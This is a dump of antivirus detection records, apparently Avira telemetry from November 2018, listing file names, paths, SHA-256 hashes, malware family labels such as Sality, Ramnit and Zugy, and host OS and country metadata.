  Row(detection=Row(filename='avscan-20181102-051859-c64f7941', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051859-C64F7941', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053651-451f7618', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053651-451F7618', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055343-a0017ec4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055343-A0017EC4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055536-e3bd084e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055536-E3BD084E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053739-61df3925', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053739-61DF3925', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053803-6fcffd0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053803-6FCFFD0F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055452-c9300c5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055452-C9300C5F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:06:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053245-b23c1d92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053245-B23C1D92', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xmancommand.exe', filepath='C:\\Program Files\\Adobe\\Adobe Extension Manager CS5.5\\XManCommand.exe', filesize=112000, name='W32/Infector.Gen.#M300.#R7863'), hash='7f0f72d655f1412678338f6e36f342553f624a48f74f8fd13927d5b5a87118ff', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:C4+PjhWBlUuvceqp.1', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-02T15:49:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055456-cb85d8e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055456-CB85D8E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054444-5f2d2374', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054444-5F2D2374', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054745-cb2631b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054745-CB2631B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055914-65597d72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055914-65597D72', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051758-a1864981', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051758-A1864981', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050833-50f9e4f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050833-50F9E4F9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053752-69b5f705', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053752-69B5F705', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060129-b636af16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060129-B636AF16', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051208-d13ea0d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051208-D13EA0D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053951-b063219a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053951-B063219A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052515-a6147c6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052515-A6147C6C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060915-cbb21855', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060915-CBB21855', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060506-3731ceb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060506-3731CEB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051444-2e613511', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051444-2E613511', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054705-b35c248c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054705-B35C248C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055840-513d7105', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055840-513D7105', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051155-c9439daf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051155-C9439DAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055144-5932e0c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055144-5932E0C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='130905.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PROGRM\\130905\\130905.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154852-79bd44e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154852-79BD44E8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155532-3d4356f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155532-3D4356F4', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110204-6987a1dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105713-3526A361\\AVSCAN-20181101-110204-6987A1DD', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143309-7c96d780', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-142842-4F9964B3\\AVSCAN-20181101-143309-7C96D780', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hiplifes cool.exe', filepath='\\\\?\\D:\\Hiplifes Cool.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe975_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe975 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T18:17:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173412-ead06ecd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db2e8173\\AVSCAN-20181101-173336-E6080A2C\\AVSCAN-20181101-173412-EAD06ECD', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:34:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155543-3ec82c94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155543-3EC82C94', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:19:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190934-68f84bd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d93eb456\\AVSCAN-20181101-190334-3F223839\\AVSCAN-20181101-190934-68F84BD2', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:09:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{2EE500BE-2AB5-49DB-9AE1-E1ACF7D4782D}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='359b9d05250d48c16fca570a2542ac05218be427003cec0757ab4725646fbdc9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='upah.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\GAVANS\\UPAH\\UPAH.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmcuninstall.exe', filepath='I:\\Program Files\\SPT\\Driver\\Samsung Agere GSM USB Driver Ver 4.20\\agsm_v4_20\\WMCUninstall.exe', filesize=2560000, name='W32/Ramnit.C.#M1.#R1'), hash='3ea6d68e3f3b6010a57bf5b30b44382a2e901786e425bb4369da8c195d5c7e69', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:01:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10492650\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:10:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1d563aca47ba0cb20387b3d8ccb65eda25a431b4b466711f0ee07f42f6785a79', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T17:32:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155706-ccdc4fc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155706-CCDC4FC3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mediaget_id3096279ids2s.exe', filepath='F:\\НОУТБУК\\разобрать\\MediaGet_id3096279ids2s.exe', filesize=660000, name='PUA/MediaGet.Gen5.#M300.#R400493'), hash='39f73a8cee4a757a42eaa24082c03e16779360d5999678ddcc079b88db6738da', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T18:34:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:17:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105845-9e26f533', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105845-9E26F533', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='overseer.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\avast software\\overseer\\overseer.exe', filesize=1664000, name='W32/Sality.Patched.#M1.#R1'), hash='680994ce4d9dcb697b40aa51d62c5f3128c589b96e6c8720503b3d5e4484bebc', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:37:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='n.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\SystemMonitor\\n.dll', filesize=9060000, name='PUA/PUA/CPUGuardian.#M1.#R1'), hash='ca7a812237ef6c287bb44e5729273694e0d9108a890fc1f1271589c3d3d335e2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:28:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123443-19efde13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123422-07FB4430\\AVSCAN-20181101-123443-19EFDE13', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:34:43Z'), dt=datetime.date(2018, 11, 1)),
